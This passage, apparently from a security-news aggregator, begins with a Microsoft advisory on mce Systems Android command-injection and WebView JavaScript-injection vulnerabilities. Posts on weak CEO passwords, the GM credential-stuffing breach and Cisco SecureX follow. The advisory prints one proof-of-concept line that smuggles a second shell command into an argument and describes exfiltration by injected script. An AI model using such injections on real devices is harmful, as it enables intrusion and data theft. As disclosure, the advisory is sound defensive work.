Outdated command-injection vulnerability (CVE-2021-42599)

We found a command-injection vulnerability, tracked as CVE-2021-42599, in the Device service mentioned in the previous section. This service offers rich functionality, including the capability to stop activities of a given package. The client fully controls the argument “value,” and simply runs the following command:

am force-stop "value"

Since the argument is not sanitized, an attacker could add backticks or quotation marks to run arbitrary code, like the following:

am force-stop "a"; command-to-run; echo "a"
Figure 4: Command injection proof-of-concept (POC) exploit code implemented in the Device service

According to mce Systems, they have since removed the functionality behind this vulnerability and it is no longer present in more advanced framework versions.

Exploitation by JavaScript injection with PiTM in certain apps

The services offered by the mce framework further indicated that the following vulnerability resided in the logic of the JavaScript client for apps that are configured to enable plaintext communications such as the app that we initially analyzed. Interestingly, the code for the client is a heavily-obfuscated dynamic JavaScript code that is implemented over several files, mainly bundle.js. Due to the blind trust between the JavaScript client and the JarvisJSInterface server, an attacker who could inject JavaScript contents into the WebView would inherit the permissions that the app already has.

We conceived two injection strategies most likely to be leveraged by attackers:

  1. Affect the JavaScript client behavior by supplying specific GET parameters from the BROWSABLE Intent.
  2. Trigger an app with the BROWSABLE Intent to become a person-in-the-middle (PiTM) and view the device’s entire traffic. Inject JavaScript code if the client ever tries to fetch external content and interpret it as a script or HTML.

Once we reverse-engineered the client’s obfuscated code, we discovered that it could not inject JavaScript from the GET parameters. The only capability permitted was to affect some of the client’s self-tests upon initialization, such as a battery-draining test or a Wi-Fi connectivity test. However, the WebView-fetched plaintext pages that we discovered could be injected into with a PiTM attack.

Our proof-of-concept (POC) exploit code was therefore:

  1. Perform a PiTM for the target device and lure the user into clicking a link with the “mcesystems://” schema.
  2. Inject JavaScript into one of the plaintext page responses that does the following:
    • Hijack the JavaScript interface by calling init with our callback method
    • Use the JavaScript interface request method to get servicing
    • Send the data to our server for information gathering using XHR (XMLHttpRequest)
Figure 5: Injecting a similar JavaScript code to the WebView could allow an attacker to call arbitrary services and methods

Local elevation of privilege with deserialization followed by injection (CVE-2021-42601)  

Some of the apps we analyzed did not pull plaintext pages. Thus, we looked for a local elevation of privilege vulnerability, allowing a malicious app to gain the system apps’ privileges, tracked as CVE-2021-42601.

In the apps mentioned above, we discovered that the main Activity attempted to handle a deep link (a link that launches an app instead of a browser on click) with Google Firebase. Interestingly, this deep-link handling tried to deserialize a structure called PendingDynamicLinkData (representing a link) from an Intent Extra byte array with the key com.google.firebase.dynamiclinks.DYNAMIC_LINK_DATA. This structure was used later by the mce framework to generate various JSON Objects that might contain data from a categoryId query parameter in the original link, and eventually ended up in the member mFlowSDKInput to be injected into the JarvisWebView instance in an unsafe way:

Figure 6: Unsanitized JavaScript loading allowed arbitrary code injection to the WebView

Since the categoryId query parameter might contain apostrophes, one could inject arbitrary JavaScript code into the WebView. We decided to inject a code that would reach out to a server and load a second-stage code, which was the exact one we used for our PiTM scenario.

Figure 7: Local injection POC exploit

Software design against JavaScript injection vulnerabilities

We worked closely with the mce Systems engineering team and discovered that the reason for unsafe loadUrl invocations with JavaScript injections was that the framework used an asynchronous model of operation. When the JavaScript client performs a request, it expects to be notified later when there are results. Since Android JavaScript Bridge only allows primitive types to be sent (for example, Strings), the mce framework notified the JavaScript client by injecting JavaScript with potentially unsafe arguments (the results themselves).

We offered mce Systems a slightly different software design that prevents unsafe JavaScript injection. The description of the flow of information in our proposal is as follows:

  1. The JavaScript client invokes the request method on the Android JavaScript Bridge, supplying the request itself along with a request ID.
  2. The Java server performs the request and stores the result in a cache. The said cache then maps request IDs to results.
  3. The Java server notifies the client by carefully injecting the JavaScript loadUrl(“javascript:window.onMceResult(<requestID>);”) into the WebView. Note that the only non-constant string is the request ID, which can easily be sanitized. This method “wakes the client up”
  4. The JavaScript client implementation of onMceResult invokes the Android JavaScript Bridge with the method String fetchResult(String requestId). Note that this method returns a string (which contains the result).

This way, the JavaScript client does not need to poll for asynchronous results while data is safely transferred between the client and the server.

Interestingly, Google AndroidX offers a very similar API: webMessageListener. While the said API works quite similarly to our suggestion, it only supports Android versions greater than Lollipop. Thus, the new mce framework now checks the Android version and uses this new Google API if supported or our offered solution for older devices.

The above is just one example of our collaboration to help secure our cross-platform ecosystem. According to mce Systems, all of our reported vulnerabilities were addressed.

Improving security for all through threat intelligence sharing and research-driven protections

Microsoft strives to continuously improve security by collaborating with customers, partners, and industry experts. Responding to the evolving threat landscape requires us to expand our capabilities into other devices and non-Windows platforms in addition to further coordinating research and threat intelligence sharing among the larger security community. This case highlighted the need for expert, cross-industry collaboration to effectively mitigate issues.

Moreover, collaborative research such as this informs our seamless protection capabilities across platforms. For example, intelligence from this analysis helped us ensure that Microsoft Defender Vulnerability Management can identify and remediate devices that have these vulnerabilities, providing security operations teams with comprehensive visibility into their organizational exposure and enabling them to reduce the attack surface. In addition, while we’re not aware of any active exploitation of these mobile vulnerabilities in the wild, Microsoft Defender for Endpoint’s mobile threat defense capabilities significantly improve security on mobile devices by detecting potential exploits, malware, and post-exploitation activity.

We will continue to work with the security community to share intelligence about threats and build better protection for all. Microsoft security researchers continually work to discover new vulnerabilities and threats, turning a variety of wide-reaching issues into tangible results and improved solutions that protect users and organizations across platforms every single day. Similarly inquisitive individuals are encouraged to check opportunities to join the Microsoft research team here: https://careers.microsoft.com/.  

Jonathan Bar Or, Sang Shin Jung, Michael Peck, Joe Mansour, and Apurva Kumar
Microsoft 365 Defender Research Team

Source :
https://www.microsoft.com/security/blog/2022/05/27/android-apps-with-millions-of-downloads-exposed-to-high-severity-vulnerabilities/

Why you should act like your CEO’s password is “qwerty”

A poor password at the highest levels of an organisation can cost a company millions in losses.

Recent findings show that half of IT leaders store passwords in shared documents. On top of that, it seems that folks at executive level are not picking good passwords either. Researchers from NordPass combed through a large list of CEO and business owner breaches. Their findings should renew considerations for additional security measures at executive level.

The findings

The five most common passwords among C-level executives, managers, and business owners were “123456”, “password”, “12345”, “123456789”, and our old friend “qwerty”. Terrifyingly, but perhaps not surprisingly, this looks exactly like every other list of the most frequently used passwords, suggesting no extra precautions are in place (or enforced) at the top.

Executives really love to use the names “Tiffany”, “Charlie”, Michael”, and “Jordan” for their passwords. I was curious to know if these are the names of executives’ name their kids. My entirely unscientific trawl for the names of CEO’s children turned up list of CEOs themselves. Henry, William, Jack, James, and David are all very popular names. This doesn’t match up with our list of password names. However, there is one list which claims that the Michaels of this world are most likely to become CEOs. Are CEOs naming their passwords after themselves? I’d like to think not, but then I probably wouldn’t have expected to be writing about “123456” either.

Animals and mythical creatures are popular choices. When not naming passwords after themselves, dragons and monkeys are both incredibly popular and also incredibly easy to guess.

Breaking and entering

Common ways corporate breaches and basic passwords spill all over the floor are issues we’ve covered at length. We recently highlighted recommendations from the Cybersecurity and Infrastructure Security Agency which deal with most of the causes of CEO password loss.

A combination of weak and reused passwords, and risky password-sharing habits make up the majority of hits on the “these passwords can lead to nothing good” indicator.

What happens when you combine bad password practices with human error and poor security infrastructure? These weak and obvious passwords just help to bring the whole thing crashing down that little bit faster.

There are some very smart attacks and compromises out there. Clever attackers can exfiltrate data from a network for weeks or months before making a more overt move. You’d expect people hijacking CEO data to be made to really work for it at every level. Sadly this research seems to suggest the opposite is happening in a lot of cases.

If nothing else, I’d love to see the actual response on the part of the criminals. What do they think when pulling down a C-Level executive’s data and discovering their email password is “sandwich”? Are they surprised? Is it business as usual? Do they think it can’t possibly be real, and they’re staring down the wrong end of a prank or law enforcement bust?

Is the CEO password sky falling? A word of caution…

There are some caveats here. The research doesn’t go into detail with regard to additional security measures in place. Yes, a CEO may have the worst password you’ve ever seen. That doesn’t mean the business has been popped right open.

Maybe they had two-factor authentication (2FA) set up. The password may be gone, but unless the attacker also has access to the CEO’s authentication app on their phone, it may not be much use. The CEO may use a hardware authentication token plugged into their desktop. Admins may have set up that one machine specifically for use by the CEO, for all CEO-related activity. It may not be usable remotely, and could be tied to a VPN an added precaution.

Having said all of that

Manager? Use a password manager

If we’re talking purely about fixing the short, terrible, obvious passwords, then some additional work is required. 2FA, lockouts, and hardware tokens are great. Ultimately they’re fixing a myriad of additional problems regardless of whether the password is good or bad.

To fix bad password practices, we need to look to tools which can improve them and help keep them a bit more secure at the same time. I am talking about password managers, of course.

A password manager is a software application that gets around the twin evils of poor passwords and password reuse by creating strong, random passwords and then remembering them.

They can function online, so they are accessible via the web and can sync passwords between devices, or they can work entirely offline. Offline password managers are arguably more secure. Online components can add additional risk factors and a way for someone to break in via exploits. The important part is to keep the master password to access your vault secure, and to use 2FA if available for an additional layer of protection. Make your master password long and complex—don’t use “qwerty”.

Password managers with browser extensions can help deter phishing. Your password manager will object to entering a password into the wrong website, no matter how convincing it looks. No more risk of accidental logins!

Some password manager tools allow you to share logins with other users in a secure fashion. They don’t show or display the password to the other users, rather they just grant a form of access managed by the tool or app itself. If your CEO has no option but to share a password with somebody else, this is the only safe way to do it.

There’s never been a better time to wean ourselves away from shared password documents and the name “Michael” as the digital keys to an organisation’s kingdom. It’s perhaps time for CEOs and other executives to lead from the front where security is concerned.

Source :
https://blog.malwarebytes.com/malwarebytes-news/2022/05/why-you-should-act-like-your-ceos-password-is-querty/

General Motors suffers credential stuffing attack

American car manufacturer General Motors (GM) says it experienced a credential stuffing attack last month. During the attack customer information and reward points were stolen.

The subject of the attack was an online platform, run by GM, to help owners of Chevrolet, Buick, GMC, and Cadillac vehicles to manage their bills, services, and redeem rewards points.

Credential stuffing

Credential stuffing is a special type of brute force attack where the attacker uses existing username and password combinations, usually ones that were stolen in a data breach on another service.

The intention of such an attack is not to take over the website or platform, but merely to get as many valid user account credentials and use that access to commit fraud, or sell the valid credentials to other criminals.

To stop a target from just blocking their IP address, an attacker will typically use rotating proxies. A rotating proxy is a proxy server that assigns a new IP address from the proxy pool for every connection.

The attack

GM disclosed that it detected the malicious login activity between April 11 and April 29, 2022, and confirmed that the threat actors exchanged customer reward bonuses of some customers for gift certificates.

The My GM Rewards program allows members to earn and redeem points toward buying or leasing a new GM vehicle, as well as for parts, accessories, paid Certified Service, and select OnStar and Connected Services plans.

GM says it immediately investigated the issue and notified affected customers of the issues.

Victims

GM contacted victims of the breach, advising them to follow instructions to recover their GM account. GM is also forcing affected users to reset their passwords before logging in to their accounts again. In the notification for affected customers, GM said it will be restoring rewards points for all customers affected by this breach.

GM specifically pointed out that the credentials used in the attack did not come from GM itself.

“Based on the investigation to date, there is no evidence that the log in information was obtained from GM itself. We believe that unauthorized parties gained access to customer login credentials that were previously compromised on other non-GM sites and then reused those credentials on the customer’s GM account.”

Stolen information

Attackers could have accessed the following Personally Identifiable Information (PII) of a compromised user:

  • First and last name
  • Email address
  • Physical address
  • Username and phone number for registered family members tied to the account
  • Last known and saved favorite location information
  • Search and destination information

Other information that was available was car mileage history, service history, emergency contacts, Wi-Fi hotspot settings (including passwords), and currently subscribed OnStar package (if applicable).

GM is offering credit monitoring for a year.

Mitigation

What could GM have done to prevent the attack? It doesn’t currently offer multi-factor authentication (MFA)which would have stopped the attackers from gaining access to the accounts. GM does ask customers to add a PIN for all purchases.

This incident demonstrates how dangerous it is to re-use your passwords for sites, services and platforms. Even if the account doesn’t seem that important to you, the information obtainable by accessing the account could very well be something you wish to keep private.

Always use a different password for every service you use, and consider using a password manager to store them all. You can read some more of our tips on passwords in our blog dedicated to World Password Day.

Stay safe, everyone!

Source :
https://blog.malwarebytes.com/reports/2022/05/general-motors-suffers-credential-stuffing-attack/

New in SecureX: Device Insights

Since its release, Cisco SecureX has helped over 10,000 customers gain better visibility into their infrastructure. As the number of devices in many customer environments continues to increase, so does the number of products with information about those devices. Between mobile device managers (MDM), posture agents, and other security products, a wealth of data is being collected but is not necessarily being shared or, more importantly, correlated. With the new device insights feature in Cisco SecureX, now available for all SecureX customers, we’re changing that.

Introducing Device Insights

Device insights, which is now generally available, extends our open, platform approach to SecureX by allowing you to discover, normalize, and consolidate information about the devices in your environment. But this isn’t just another dashboard pulling data from multiple sources. Device insights fetches data from sources you might expect, like your mobile device manager, but also leverages the wealth of data available in your Cisco Secure products such as Cisco Secure Endpoint, Orbital, Duo, and Umbrella. Combining these sources of data allows you to discover devices that may be sneaking through gaps in your normal device management controls and gain a comprehensive view into each device’s security posture and management status. With device insights, you’ll be able to answer these all-important questions:

  • What types of devices are connected in our environment?
  • What users have been accessing those devices?
  • Where are those devices located?
  • What vulnerabilities are associated with each device?
  • Which security agents are installed?
  • Is the security software is up to date?
  • What context do we have from technologies beyond the endpoint?

Supported Data Sources

Now, you might ask: what types of data can I bring into device insights? When we created SecureX, we built a flexible architecture based on modules that anyone can create. Device insights extends this architecture by adding a new capability to our module framework. Here’s a look at what data sources will be supported at launch:

Bringing Everything Together

Once you’ve enabled your data sources, device insights will periodically retrieve data from each source and get to work. Some sources can also publish data in real time to device insights using webhooks. We normalize all of the data and then correlate it between sources so you have one view into each of your devices, not a mess of duplicate information. This results in a single, unified dashboard with easy filtering, a high level view into your environment, and a customizable table of devices (which you can export too!). To see more information about a device, just click on one and you’ll see everything device insights knows, including which source provided which data.

screenshot: SecureX device status dashboard
screenshot: SecureX device detail view

Getting Started

To get started with device insights, simply log into Cisco SecureX and click the new Insights tab! For more information about device insights, check out these resources:

Exit mobile version